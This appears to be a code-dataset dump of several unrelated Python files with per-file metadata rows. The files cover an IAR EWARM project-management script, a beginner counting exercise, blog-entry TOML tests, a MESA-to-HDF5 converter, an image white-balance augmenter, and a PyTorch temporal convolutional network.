os.remove(item_path)
except OSError:
Exit("Can not delete \"" + item_path + "\" file")
else:
try:
shutil.rmtree(item_path, True)
except IOError:
Exit("Can not delete \"" + item_path + "\" folder")
else:
Exit("\"" + workspace_path + "\" is not *.eww file")
else:
Exit("Can not find: \"" + workspace_path + "\" file")
# ------------------------------------------------------------------------------
# Rename workspace with specified name
# ------------------------------------------------------------------------------
def RenameWorkspace(workspace_path, new_workspace_name):
if os.path.isfile(workspace_path):
if workspace_path.endswith(".eww"):
rename_path = workspace_path.split("/")
rename_path[-1] = new_workspace_name + ".eww"
rename_path = "/".join(rename_path)
try:
os.rename(workspace_path, rename_path)
except OSError:
Exit("Can not rename \"" + workspace_path + "\" file")
else:
Exit("\"" + workspace_path + "\" is not *.eww file")
else:
Exit("Can not find: \"" + workspace_path + "\" file")
# ------------------------------------------------------------------------------
# Rename project with specified name
# ------------------------------------------------------------------------------
def RenameProject(project_path, workspace_path, new_project_name):
if os.path.isfile(project_path):
if os.path.isfile(workspace_path):
if project_path.endswith(".ewp"):
if workspace_path.endswith(".eww"):
rename_path = project_path.split("/")
old_project_name = rename_path[-1]
rename_path[-1] = new_project_name + ".ewp"
rename_path = "/".join(rename_path)
try:
os.rename(project_path, rename_path)
except OSError:
Exit("Can non rename \"" + project_path + "\" file")
text_to_replace = "$WS_DIR$\\" + old_project_name
replace_text = "$WS_DIR$\\" + new_project_name + ".ewp"
ReplaceTextInFile(workspace_path, text_to_replace,
replace_text)
else:
Exit("\"" + workspace_path + "\" is not *.eww file")
else:
Exit("\"" + project_path + "\" is not *.ewp file")
else:
Exit("Can not find: \"" + workspace_path + "\" file")
else:
Exit("Can not find: \"" + project_path + "\" file")
# ------------------------------------------------------------------------------
# Common functions
# ------------------------------------------------------------------------------
# Replace text in file
def ReplaceTextInFile(file_name, text_to_replace, replace_text):
if os.path.exists(file_name):
try:
file = open(file_name, "r")
text = file.read()
file.close()
file = open(file_name, "w")
file.write(text.replace(text_to_replace, replace_text))
file.close()
except IOError:
Exit("Can not handle \"" + file_name + "\" file")
else:
Exit("Can not find \"" + file_name + "\" file")
# Copy folder tree
def CopyTree(src, dst, symlinks = False, ignore = None):
if not os.path.exists(dst):
MakeDir(dst)
for item in os.listdir(src):
s = os.path.join(src, item)
d = os.path.join(dst, item)
if os.path.isdir(s):
try:
shutil.copytree(s, d, symlinks, ignore)
except IOError:
Exit("Can not copy \"" + s + "\" folder")
else:
CopyFile(s, d)
# Make directory
def MakeDir(directory):
try:
os.makedirs(directory)
except OSError:
Exit("Can not create \"" + directory + "\" folder")
# Copy file
def CopyFile(src, dst):
try:
shutil.copy2(src, dst)
except IOError:
Exit("Can not copy \"" + src + "\"")
# Normalize a path to the form "folder/subfolder/file.xxx"
def DecoratePath(path):
if path.endswith("/"):
path = "/".join(path.split("/")[0:-1])
if path.startswith("./"):
path = "/".join(path.split("/")[1:])
return path
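# Example: DecoratePath("./drivers/uart/") returns "drivers/uart"
# (hypothetical path; a trailing "/" and a leading "./" are both stripped).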
# Print message and exit
def Exit(exit_message):
print(exit_message)
exit(1)
# ------------------------------------------------------------------------------
# Main
# ------------------------------------------------------------------------------
if __name__ == "__main__":
arg_parser = CreateArgParser()
arg_parser_namespace = arg_parser.parse_args()
# Create command
if arg_parser_namespace.command == "create":
if (arg_parser_namespace.help == True or
arg_parser_namespace.name == None or
arg_parser_namespace.device == None):
Exit(CREATE_HELP_MESSAGE)
else:
Create(arg_parser_namespace.name, arg_parser_namespace.device)
# Add folder command
elif arg_parser_namespace.command == "add_folder":
if (arg_parser_namespace.help == True or
arg_parser_namespace.project_path == None or
arg_parser_namespace.folder_path == None):
Exit(ADD_FOLDER_HELP_MESSAGE)
else:
AddFolder(arg_parser_namespace.project_path,
arg_parser_namespace.folder_path,
arg_parser_namespace.ignore)
# Clean command
elif arg_parser_namespace.command == "clean":
if (arg_parser_namespace.help == True or
arg_parser_namespace.workspace_path == None):
Exit(CLEAN_HELP_MESSAGE)
else:
Clean(arg_parser_namespace.workspace_path)
# Rename workspace command
elif arg_parser_namespace.command == "rename_workspace":
if (arg_parser_namespace.help == True or
arg_parser_namespace.workspace_path == None or
arg_parser_namespace.name == None):
Exit(RENAME_WORKSPACE_HELP_MESSAGE)
else:
RenameWorkspace(arg_parser_namespace.workspace_path,
arg_parser_namespace.name)
# Rename project command
elif arg_parser_namespace.command == "rename_project":
if (arg_parser_namespace.help == True or
arg_parser_namespace.project_path == None or
arg_parser_namespace.workspace_path == None or
arg_parser_namespace.name == None):
Exit(RENAME_PROJECT_HELP_MESSAGE)
else:
RenameProject(arg_parser_namespace.project_path,
arg_parser_namespace.workspace_path,
arg_parser_namespace.name)
# Rename command
elif arg_parser_namespace.command == "rename":
if (arg_parser_namespace.help == True or
arg_parser_namespace.project_path == None or
arg_parser_namespace.workspace_path == None or
arg_parser_namespace.name == None):
Exit(RENAME_HELP_MESSAGE)
else:
RenameProject(arg_parser_namespace.project_path,
arg_parser_namespace.workspace_path,
arg_parser_namespace.name)
RenameWorkspace(arg_parser_namespace.workspace_path,
arg_parser_namespace.name)
# Undefined command
else:
Exit(MAIN_HELP_MESSAGE)
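# Usage sketch (hypothetical invocations; assumes this script is saved as
# ewarm_project.py and that the "create" subparser defines name/device options
# symmetric to the rename subparsers above):
#   python ewarm_project.py create -n MyProject -d stm32f407vg
#   python ewarm_project.py rename -p MyProject/EWARM/MyProject.ewp \
#       -w MyProject/EWARM/MyProject.eww -n NewName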
| 38.979367 | 80 | 0.571071 | 3,087 | 28,338 | 5.021056 | 0.108196 | 0.042774 | 0.048774 | 0.019355 | 0.522903 | 0.432129 | 0.379484 | 0.33871 | 0.307355 | 0.271161 | 0 | 0.005298 | 0.260639 | 28,338 | 726 | 81 | 39.033058 | 0.734488 | 0.158374 | 0 | 0.37931 | 0 | 0.002028 | 0.25908 | 0.03552 | 0.004057 | 0 | 0 | 0 | 0 | 1 | 0.034483 | false | 0 | 0.010142 | 0 | 0.052738 | 0.006085 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| a57fff444e34ab3085f258b8aa57323a8f86efde | 1,683 | py | Python | Exercicios/Exercicio070.py | RicardoMart922/estudo_Python | cb595c2a5e5aee568b6afa71b3ed9dd9cb7eef72 | ["MIT"] | null | null | null | Exercicios/Exercicio070.py | RicardoMart922/estudo_Python | cb595c2a5e5aee568b6afa71b3ed9dd9cb7eef72 | ["MIT"] | null | null | null | Exercicios/Exercicio070.py | RicardoMart922/estudo_Python | cb595c2a5e5aee568b6afa71b3ed9dd9cb7eef72 | ["MIT"] | null | null | null |
# Write a program that reads the age and sex of several people. After each
# person is registered, the program must ask whether the user wants to
# continue. At the end, show:
# A) How many people are over 18 years old.
# B) How many men were registered.
# C) How many women are under 20 years old.
maisdezoito = 0
qtdmulheres = 0
qtdhomens = 0
idade = 0
opcao = ''
sexo = ''
print('-= Enter the age and sex for each registration =-')
while True:
    idade = int(input('Age: '))
if idade > 18:
maisdezoito += 1
while True:
        sexo = str(input('Sex [M/F]: ')).upper()
if sexo == 'M' or sexo == 'F':
if sexo == 'M':
qtdhomens += 1
if sexo == 'F' and idade < 20:
qtdmulheres += 1
break
while True:
        opcao = str(input('Continue? [Y/N]: ')).upper()
        if opcao == 'Y' or opcao == 'N':
            break
    if opcao == 'N':
break
if maisdezoito == 0:
    print('No people over 18 years old were registered.')
elif maisdezoito == 1:
    print('One person over 18 years old was registered.')
else:
    print(f'{maisdezoito} people over 18 years old were registered.')
if qtdhomens == 0:
    print('No men were registered.')
elif qtdhomens == 1:
    print('Only one man was registered.')
else:
    print(f'The number of men registered was {qtdhomens}.')
if qtdmulheres == 0:
    print('No women under 20 years old were registered.')
elif qtdmulheres == 1:
    print('Only one woman under 20 years old was registered.')
else:
    print(f'The number of women under 20 who were registered was {qtdmulheres}.')
| 35.0625 | 172 | 0.62448 | 242 | 1,683 | 4.342975 | 0.322314 | 0.022835 | 0.030447 | 0.045671 | 0.202664 | 0.150333 | 0.066603 | 0.066603 | 0 | 0 | 0 | 0.026677 | 0.265003 | 1,683 | 48 | 173 | 35.0625 | 0.822959 | 0.171717 | 0 | 0.209302 | 0 | 0 | 0.394245 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.232558 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| a583106bd0bb53ab734f77ad352678e3fedf5e53 | 3,050 | py | Python | tests/test_entry.py | anaulin/tasks.py | aa05b4194ff6b01061e6842520752da515e625d6 | ["MIT"] | null | null | null | tests/test_entry.py | anaulin/tasks.py | aa05b4194ff6b01061e6842520752da515e625d6 | ["MIT"] | 2 | 2020-06-30T20:05:59.000Z | 2020-08-01T03:42:20.000Z | tests/test_entry.py | anaulin/tasks.py | aa05b4194ff6b01061e6842520752da515e625d6 | ["MIT"] | null | null | null |
import filecmp
import shutil
import tempfile
import os
from .context import entry
TEST_ENTRY = os.path.join(os.path.dirname(__file__), "test_entry.md")
TEST_ENTRY_CONTENT = """
Some content.
## A section in the content
Content that looks like frontmatter:
```
+++
but this is
not really frontmatter
+++
```
More content.
"""
def test_get_toml_and_content():
(toml, content) = entry.get_toml_and_content(TEST_ENTRY)
assert toml == {
'title': "Book Notes: The Sorcerer of the Wildeeps",
'tags': ["books", "stuff"],
'book': {'title': 'The Sorcerer of the Wildeeps', 'rating': 4}
}
assert content == TEST_ENTRY_CONTENT
def test_get_toml():
toml = entry.get_toml(TEST_ENTRY)
assert toml == {
'title': "Book Notes: The Sorcerer of the Wildeeps",
'tags': ["books", "stuff"],
'book': {'title': 'The Sorcerer of the Wildeeps', 'rating': 4}
}
def test_get_url():
url = entry.get_url("../foo/bar/this-is-the-slug.md")
assert url == "https://anaulin.org/blog/this-is-the-slug/"
url = entry.get_url("this-is-another-slug.md")
assert url == "https://anaulin.org/blog/this-is-another-slug/"
def test_add_to_toml():
with tempfile.NamedTemporaryFile() as temp:
shutil.copy2(TEST_ENTRY, temp.name)
entry.add_to_toml(temp.name, {'new_key': 'new_value'})
new_toml = entry.get_toml(temp.name)
assert new_toml == {
'title': "Book Notes: The Sorcerer of the Wildeeps",
'tags': ["books", "stuff"],
'book': {'title': 'The Sorcerer of the Wildeeps', 'rating': 4},
'new_key': 'new_value'
}
def test_add_to_toml_list():
with tempfile.NamedTemporaryFile() as temp:
shutil.copy2(TEST_ENTRY, temp.name)
entry.add_to_toml(temp.name, {'tags': ['new_tag']})
new_toml = entry.get_toml(temp.name)
assert new_toml == {
'title': "Book Notes: The Sorcerer of the Wildeeps",
'tags': ["new_tag"],
'book': {'title': 'The Sorcerer of the Wildeeps', 'rating': 4}
}
def test_write_toml():
with tempfile.NamedTemporaryFile() as temp:
shutil.copy2(TEST_ENTRY, temp.name)
entry.write_toml(temp.name, {'new_key': 'new_value'})
(new_toml, new_content) = entry.get_toml_and_content(temp.name)
(_, old_content) = entry.get_toml_and_content(TEST_ENTRY)
assert new_toml == {'new_key': 'new_value'}
assert new_content == old_content
def test_add_syndication_url():
with tempfile.NamedTemporaryFile() as temp:
shutil.copy2(TEST_ENTRY, temp.name)
entry.add_syndication_url(temp.name, "new_url")
assert entry.get_toml(temp.name)["syndication_urls"] == ["new_url"]
entry.add_syndication_url(temp.name, "another_url")
assert entry.get_toml(temp.name)["syndication_urls"] == [
"new_url", "another_url"]
def test_to_slug():
assert entry.to_slug("Some Title: With #1 and Stuff!!") == "some-title-with-1-and-stuff"
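# For reference, a minimal sketch of the fixture these tests assume
# (hypothetical reconstruction of tests/test_entry.md from the assertions
# above: TOML frontmatter delimited by +++ lines, followed by
# TEST_ENTRY_CONTENT):
#
# +++
# title = "Book Notes: The Sorcerer of the Wildeeps"
# tags = ["books", "stuff"]
#
# [book]
# title = "The Sorcerer of the Wildeeps"
# rating = 4
# +++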
| 30.19802 | 92 | 0.635082 | 411 | 3,050 | 4.486618 | 0.177616 | 0.060738 | 0.052061 | 0.069414 | 0.708243 | 0.670282 | 0.602495 | 0.602495 | 0.602495 | 0.537419 | 0 | 0.004193 | 0.218033 | 3,050 | 100 | 93 | 30.5 | 0.768973 | 0 | 0 | 0.363636 | 0 | 0 | 0.300328 | 0.02623 | 0 | 0 | 0 | 0 | 0.155844 | 1 | 0.103896 | false | 0 | 0.064935 | 0 | 0.168831 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| a585ab12f199b6ce2a2bd25bb26ea5865e4f682d | 9,190 | py | Python | nnaps/mesa/compress_mesa.py | vosjo/nnaps | bc4aac715b511c5df897ef24fb953ad7265927ea | ["MIT"] | 4 | 2020-09-24T12:55:58.000Z | 2021-05-19T14:46:10.000Z | nnaps/mesa/compress_mesa.py | vosjo/nnaps | bc4aac715b511c5df897ef24fb953ad7265927ea | ["MIT"] | 4 | 2021-06-02T09:28:35.000Z | 2021-06-04T08:32:24.000Z | nnaps/mesa/compress_mesa.py | vosjo/nnaps | bc4aac715b511c5df897ef24fb953ad7265927ea | ["MIT"] | 3 | 2020-10-05T13:18:27.000Z | 2021-06-02T09:29:11.000Z |
import os
from pathlib import Path
import numpy as np
# repack_fields is necessary since np 1.16 as selecting columns from a recarray returns an array with padding
# that is difficult to work with afterwards.
from numpy.lib import recfunctions as rf
from nnaps.mesa import fileio
from nnaps import __version__
def read_mesa_header(model):
"""
    Process the MESA history file header.
    This will require more work in the future to also handle correct type
    conversions. For now everything is treated as a string, which is fine
    because the header is ignored by the rest of nnaps.
todo: implement converting of header values to the correct data types.
:param model: list of lists
:return: numpy array containing strings with the header info.
"""
res = []
for line in model:
new_line = [l.replace('\"', '') for l in line]
res.append(new_line)
return np.array(res, str).T
def read_mesa_output(filename=None, only_first=False):
"""
Read star.log and .data files from MESA.
This returns a record array with the global and local parameters (the latter
can also be a summary of the evolutionary track instead of a profile if
you've given a 'star.log' file.
The stellar profiles are given from surface to center.
    Function written by Pieter DeGroote
:param filename: name of the log file
:type filename: str
:param only_first: read only the first model (or global parameters)
:type only_first: bool
:return: list of models in the data file (typically global parameters, local parameters)
:rtype: list of rec arrays
"""
models = []
new_model = False
header = None
# -- open the file and read the data
with open(filename, 'r') as ff:
# -- skip first 5 lines when difference file
if os.path.splitext(filename)[1] == '.diff':
for i in range(5):
line = ff.readline()
models.append([])
new_model = True
        while True:
line = ff.readline()
if not line:
break # break at end-of-file
line = line.strip().split()
if not line:
continue
# -- begin a new model
if all([iline == str(irange) for iline, irange in zip(line, range(1, len(line) + 1))]):
# -- wrap up previous model
if len(models):
try:
model = np.array(models[-1], float).T
except:
model = read_mesa_header(models[-1])
models[-1] = np.rec.fromarrays(model, names=header)
if only_first: break
models.append([])
new_model = True
continue
# -- next line is the header of the data, remember it
if new_model:
header = line
new_model = False
continue
models[-1].append(line)
if len(models) > 1:
try:
model = np.array(models[-1], float).T
except:
indices = []
for i, l in enumerate(models[-1]):
if len(l) != len(models[-1][0]):
indices.append(i)
for i in reversed(indices):
del models[-1][i]
print("Found and fixed errors on following lines: ", indices)
model = np.array(models[-1], float).T
models[-1] = np.rec.fromarrays(model, names=header)
return models
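# Usage sketch (assumes a standard MESA history file on disk; per the
# docstring above, the first returned record holds the header/global values
# and the second the evolution track):
#   header, track = read_mesa_output('LOGS/history.data')
#   print(track.dtype.names)  # column names parsed from the file header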
def get_end_log_file(logfile):
if os.path.isfile(logfile):
# case for models ran locally
ifile = open(logfile)
lines = ifile.readlines()
ifile.close()
return lines[-30:-1]
else:
return []
def convert2hdf5(modellist, star_columns=None, binary_columns=None, profile_columns=None,
add_stopping_condition=True, skip_existing=True,
star1_history_file='LOGS/history1.data', star2_history_file='LOGS/history2.data',
binary_history_file='LOGS/binary_history.data', log_file='log.txt',
profile_files=None, profiles_path='', profile_pattern='*.profile',
input_path_kw='path', input_path_prefix='', output_path=None, verbose=False):
if not os.path.isdir(output_path):
os.mkdir(output_path)
for i, model in modellist.iterrows():
print(input_path_prefix, model[input_path_kw])
if not os.path.isdir(Path(input_path_prefix, model[input_path_kw])):
continue
if skip_existing and os.path.isfile(Path(output_path, model[input_path_kw]).with_suffix('.h5')):
if verbose:
print(i, model[input_path_kw], ': exists, skipping')
continue
if verbose:
print(i, model[input_path_kw], ': processing')
# store all columns of the input file in the hdf5 file
data = {}
extra_info = {}
for col in model.index:
extra_info[col] = model[col]
# obtain the termination code and store if requested
termination_code = 'uk'
if add_stopping_condition:
lines = get_end_log_file(Path(input_path_prefix, model[input_path_kw], log_file))
for line in lines:
if 'termination code' in line:
termination_code = line.split()[-1]
extra_info['termination_code'] = termination_code
# store the nnaps-version in the output data.
extra_info['nnaps-version'] = __version__
data['extra_info'] = extra_info
# check if all history files that are requested are available and can be read. If there is an error,
# skip to the next model
history = {}
if star1_history_file is not None:
try:
d1 = read_mesa_output(Path(input_path_prefix, model[input_path_kw], star1_history_file))[1]
if star_columns is not None:
d1 = rf.repack_fields(d1[star_columns])
history['star1'] = d1
except Exception as e:
if verbose:
print("Error in reading star1: ", e)
continue
if star2_history_file is not None:
try:
d2 = read_mesa_output(Path(input_path_prefix, model[input_path_kw], star2_history_file))[1]
if star_columns is not None:
d2 = rf.repack_fields(d2[star_columns])
history['star2'] = d2
except Exception as e:
if verbose:
print("Error in reading star2: ", e)
continue
if binary_history_file is not None:
try:
d3 = read_mesa_output(Path(input_path_prefix, model[input_path_kw], binary_history_file))[1]
if star_columns is not None:
d3 = rf.repack_fields(d3[binary_columns])
history['binary'] = d3
except Exception as e:
if verbose:
print("Error in reading binary: ", e)
continue
data['history'] = history
        # check if profiles exist and store them if requested. Also make a profile lookup table (legend)
profiles = {}
profile_legend = []
profile_name_length = 0 # store longest profile name to create recarray of profile_legend
if profile_files is not None:
if profile_files == 'all':
profile_paths = Path(input_path_prefix, model[input_path_kw], profiles_path).glob(profile_pattern)
else:
profile_paths = [Path(input_path_prefix, model[input_path_kw], profiles_path, p) for p in profile_files]
for filepath in profile_paths:
if not filepath.is_file():
continue
profile_name = filepath.stem
header, profile_data = read_mesa_output(filename=filepath, only_first=False)
if profile_columns is not None:
profile_data = rf.repack_fields(profile_data[profile_columns])
profiles[profile_name] = profile_data
if len(profile_name) > profile_name_length:
profile_name_length = len(profile_name)
profile_legend.append((header['model_number'], profile_name))
if len(profiles.keys()) >= 1:
data['profiles'] = profiles
profile_legend = np.array(profile_legend, dtype=[('model_number', 'f8'),
('profile_name', 'a'+str(profile_name_length))])
data['profile_legend'] = profile_legend
        # rather annoying way to ensure that Path doesn't cut off part of the folder name when adding the .h5 suffix
# if not this will happen: M1.080_M0.502_P192.67_Z0.01129 -> M1.080_M0.502_P192.67_Z0.h5
output_file = Path(output_path, model[input_path_kw])
output_file = output_file.with_suffix(output_file.suffix + '.h5')
fileio.write2hdf5(data, output_file, update=False)
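# Usage sketch (hypothetical: modellist is a pandas DataFrame whose 'path'
# column points at MESA run directories relative to input_path_prefix):
#   import pandas as pd
#   models = pd.DataFrame({'path': ['run_001', 'run_002']})
#   convert2hdf5(models, output_path='processed/', verbose=True)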
| 38.291667 | 120 | 0.586507 | 1,159 | 9,190 | 4.482312 | 0.235548 | 0.038114 | 0.027526 | 0.036959 | 0.208277 | 0.192878 | 0.179596 | 0.150337 | 0.110298 | 0.077575 | 0 | 0.015726 | 0.328836 | 9,190 | 239 | 121 | 38.451883 | 0.826524 | 0.214146 | 0 | 0.280255 | 0 | 0 | 0.054008 | 0.003376 | 0 | 0 | 0 | 0.004184 | 0 | 1 | 0.025478 | false | 0 | 0.038217 | 0 | 0.089172 | 0.044586 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| a58a9d34b89b4bc4bc0e0b2929228a0dbbb74a83 | 1,379 | py | Python | jakso_ml/training_data/white_balancer.py | JaksoSoftware/jakso-ml | 5720ea557ca2fcf9ae16e329c198acd8e31258c4 | ["MIT"] | null | null | null | jakso_ml/training_data/white_balancer.py | JaksoSoftware/jakso-ml | 5720ea557ca2fcf9ae16e329c198acd8e31258c4 | ["MIT"] | 3 | 2020-09-25T18:40:52.000Z | 2021-08-25T14:44:30.000Z | jakso_ml/training_data/white_balancer.py | JaksoSoftware/jakso-ml | 5720ea557ca2fcf9ae16e329c198acd8e31258c4 | ["MIT"] | null | null | null |
import random, copy
import cv2 as cv
import numpy as np
from scipy import interpolate
from .augmenter import Augmenter
class WhiteBalancer(Augmenter):
'''
Augmenter that randomly changes the white balance of the SampleImages.
'''
def __init__(
self,
min_red_rand,
max_red_rand,
min_blue_rand,
max_blue_rand,
**kwargs
):
super().__init__(**kwargs)
self.min_red_rand = min_red_rand
self.max_red_rand = max_red_rand
self.min_blue_rand = min_blue_rand
self.max_blue_rand = max_blue_rand
def augment(self, sample):
sample_copy = copy.deepcopy(sample)
b, g, r = cv.split(sample_copy.image)
rand_b = 128 * random.uniform(1 + self.min_blue_rand, 1 + self.max_blue_rand)
rand_r = 0
if rand_b < 1:
rand_r = 128 * random.uniform(1, 1 + self.max_red_rand)
else:
rand_r = 128 * random.uniform(1 + self.min_red_rand, 1)
lut_b = self._create_lut(rand_b)
lut_r = self._create_lut(rand_r)
b = cv.LUT(b, lut_b)
r = cv.LUT(r, lut_r)
sample_copy.image = cv.merge((b, g, r))
return sample_copy
def _create_lut(self, center):
tck = interpolate.splrep([0, 128, 256], [0, center, 256], k = 2)
lut = np.rint(interpolate.splev(range(256), tck, der = 0))
lut = np.where(lut > 255, 255, lut)
lut = np.where(lut < 0, 0, lut)
lut = np.uint8(lut)
return lut
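# Usage sketch (hypothetical parameter values; `sample` is assumed to be a
# SampleImage-like object from the surrounding jakso_ml package whose .image
# attribute is a BGR numpy array, as the cv.split call above expects):
#   balancer = WhiteBalancer(min_red_rand=-0.2, max_red_rand=0.2,
#                            min_blue_rand=-0.2, max_blue_rand=0.2)
#   augmented = balancer.augment(sample)  # deep copy with shifted white balance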
| 25.072727 | 81 | 0.658448 | 224 | 1,379 | 3.78125 | 0.28125 | 0.066116 | 0.047226 | 0.049587 | 0.173554 | 0.088548 | 0 | 0 | 0 | 0 | 0 | 0.040338 | 0.226976 | 1,379 | 54 | 82 | 25.537037 | 0.754221 | 0.050761 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.073171 | false | 0 | 0.121951 | 0 | 0.268293 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| a590274916afd797594033b1e72a778f82d65211 | 4,415 | py | Python | src/algorithms/tcn_utils/tcn_model.py | pengkangzaia/mvts-ano-eval | 976ffa2f151c8f91ce007e9a455bb4f97f89f2c9 | ["MIT"] | 24 | 2021-09-04T08:51:55.000Z | 2022-03-30T16:45:54.000Z | src/algorithms/tcn_utils/tcn_model.py | pengkangzaia/mvts-ano-eval | 976ffa2f151c8f91ce007e9a455bb4f97f89f2c9 | ["MIT"] | 3 | 2021-10-12T02:34:34.000Z | 2022-03-18T10:37:35.000Z | src/algorithms/tcn_utils/tcn_model.py | pengkangzaia/mvts-ano-eval | 976ffa2f151c8f91ce007e9a455bb4f97f89f2c9 | ["MIT"] | 15 | 2021-09-18T03:41:02.000Z | 2022-03-21T09:03:01.000Z |
import torch
import torch.nn as nn
from torch.nn.utils import weight_norm
"""TCN adapted from https://github.com/locuslab/TCN"""
class Chomp1d(nn.Module):
def __init__(self, chomp_size):
super(Chomp1d, self).__init__()
self.chomp_size = chomp_size
def forward(self, x):
return x[:, :, :-self.chomp_size].contiguous()
class pad1d(nn.Module):
def __init__(self, pad_size):
super(pad1d, self).__init__()
self.pad_size = pad_size
def forward(self, x):
return torch.cat([x, x[:, :, -self.pad_size:]], dim = 2).contiguous()
class TemporalBlock(nn.Module):
def __init__(self, n_inputs, n_outputs, kernel_size, stride, dilation, padding,
dropout=0.2):
super(TemporalBlock, self).__init__()
self.conv1 = weight_norm(nn.Conv1d(n_inputs, n_outputs, kernel_size,
stride=stride, padding=padding,
dilation=dilation))
self.chomp1 = Chomp1d(padding)
self.relu1 = nn.ReLU()
self.dropout1 = nn.Dropout(dropout)
self.conv2 = weight_norm(nn.Conv1d(n_outputs, n_outputs, kernel_size,
stride=stride, padding=padding,
dilation=dilation))
self.chomp2 = Chomp1d(padding)
self.relu2 = nn.ReLU()
self.dropout2 = nn.Dropout(dropout)
self.net = nn.Sequential(self.conv1, self.chomp1, self.relu1, self.dropout1,
self.conv2, self.chomp2, self.relu2, self.dropout2)
self.downsample = nn.Conv1d(n_inputs, n_outputs, 1) if n_inputs != n_outputs else None
self.relu = nn.ReLU()
self.init_weights()
def init_weights(self):
self.conv1.weight.data.normal_(0, 0.01)
self.conv2.weight.data.normal_(0, 0.01)
if self.downsample is not None:
self.downsample.weight.data.normal_(0, 0.01)
def forward(self, x):
out = self.net(x)
res = x if self.downsample is None else self.downsample(x)
return self.relu(out + res)
class TemporalBlockTranspose(nn.Module):
def __init__(self, n_inputs, n_outputs, kernel_size, stride, dilation, padding,
dropout=0.2):
super(TemporalBlockTranspose, self).__init__()
self.conv1 = weight_norm(nn.ConvTranspose1d(n_inputs, n_outputs, kernel_size,
stride=stride, padding=padding,
dilation=dilation))
self.pad1 = pad1d(padding)
self.relu1 = nn.ReLU()
self.dropout1 = nn.Dropout(dropout)
self.conv2 = weight_norm(nn.ConvTranspose1d(n_outputs, n_outputs, kernel_size,
stride=stride, padding=padding,
dilation=dilation))
self.pad2 = pad1d(padding)
self.relu2 = nn.ReLU()
self.dropout2 = nn.Dropout(dropout)
self.net = nn.Sequential(self.dropout1, self.relu1, self.pad1, self.conv1,
self.dropout2, self.relu2, self.pad2, self.conv2)
self.downsample = nn.ConvTranspose1d(n_inputs, n_outputs, 1) if n_inputs != n_outputs else None
self.relu = nn.ReLU()
self.init_weights()
def init_weights(self):
self.conv1.weight.data.normal_(0, 0.01)
self.conv2.weight.data.normal_(0, 0.01)
if self.downsample is not None:
self.downsample.weight.data.normal_(0, 0.01)
def forward(self, x):
out = self.net(x)
res = x if self.downsample is None else self.downsample(x)
return self.relu(out + res)
class TemporalConvNet(nn.Module):
def __init__(self, num_inputs, num_channels, kernel_size=2, dropout=0.2):
super(TemporalConvNet, self).__init__()
layers = []
num_levels = len(num_channels)
for i in range(num_levels):
dilation_size = 2 ** i
in_channels = num_inputs if i == 0 else num_channels[i-1]
out_channels = num_channels[i]
layers += [TemporalBlock(in_channels, out_channels, kernel_size, stride=1, dilation=dilation_size,
padding=(kernel_size-1) * dilation_size, dropout=dropout)]
self.network = nn.Sequential(*layers)
def forward(self, x):
return self.network(x)
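# Usage sketch (assumed shapes): the TCN consumes (batch, channels, time)
# tensors and, thanks to the Chomp1d causal-padding trick, preserves the
# time dimension:
#   tcn = TemporalConvNet(num_inputs=3, num_channels=[32, 32, 64], kernel_size=3)
#   y = tcn(torch.randn(8, 3, 100))  # -> shape (8, 64, 100)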
| 39.070796 | 110 | 0.59479 | 543 | 4,415 | 4.639042 | 0.151013 | 0.03811 | 0.025407 | 0.047638 | 0.630012 | 0.590711 | 0.5526 | 0.529575 | 0.529575 | 0.529575 | 0 | 0.02859 | 0.294904 | 4,415 | 112 | 111 | 39.419643 | 0.780597 | 0 | 0 | 0.505618 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.134831 | false | 0 | 0.033708 | 0.033708 | 0.280899 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
| a591a1103146cfd95f29ba55d7e7f556a915a79a | 1,868 | py | Python | static/file/2021-04-10/index.py | yuguo97/nest-node | a3d6cb99005403691779c44a488e3b22f5479538 | ["MIT"] | null | null | null | static/file/2021-04-10/index.py | yuguo97/nest-node | a3d6cb99005403691779c44a488e3b22f5479538 | ["MIT"] | null | null | null | static/file/2021-04-10/index.py | yuguo97/nest-node | a3d6cb99005403691779c44a488e3b22f5479538 | ["MIT"] | null | null | null |
'''
Author: your name
Date: 2021-04-08 17:14:41
LastEditTime: 2021-04-09 09:13:28
LastEditors: Please set LastEditors
Description: In User Settings Edit
FilePath: \github\test\index.py
'''
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import psutil
cpu_info = {'user': 0, 'system': 0, 'idle': 0, 'percent': 0}
